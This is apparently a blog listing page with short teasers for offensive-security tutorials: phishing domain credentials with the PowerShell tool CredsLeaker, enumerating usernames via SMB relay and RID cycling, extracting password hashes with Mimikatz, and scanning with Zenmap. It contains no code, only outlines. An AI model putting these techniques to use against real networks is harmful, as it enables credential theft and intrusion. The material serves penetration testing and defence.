Phish domain user credentials with CredsLeaker with Powershell

CredsLeaker is a powershell script that phishes information from the user. It will popup a user authentication box – The script will check the details against the domain controller until it has valid credentials.  Normally this screen is pretty common in a domain scenario and the user may have seen this box before. Once CredsLeaker … Read morePhish domain user credentials with CredsLeaker with Powershell

Enumerate usernames on a domain with no permissions

RidRelay is a python script to enumerate usernames on a domain where you have no permissions at all. It is a quick and easy way to get domain usernames while on an internal network. RidRelay combines the SMB Relay attack, common lsarpc based queries and RID cycling to get a list of domain usernames. It … Read moreEnumerate usernames on a domain with no permissions

Retrieve domain password hashes with Mimikatz

Mimikatz is a windows security tool that can be used to extract passwords from Windows/Windows Servers. One way of doing this manually is extracting the information from the NTDS.DIT file, which is the Active Directory database. This can be tricky to extract, as it’s current open and generally inaccessible whilst the server is running. This … Read moreRetrieve domain password hashes with Mimikatz

Scanning networks with Zenmap (nmap GUI)

One of the most useful tools already included in Kali Linux is a front-end UI to nmap. This will allow you to visually see scan results and perform tasks on hosts; without knowing the command line options of nmap. Although included in Kali by default, Zenmap can be easily installed on any Linux distribution. Zenmap … Read moreScanning networks with Zenmap (nmap GUI)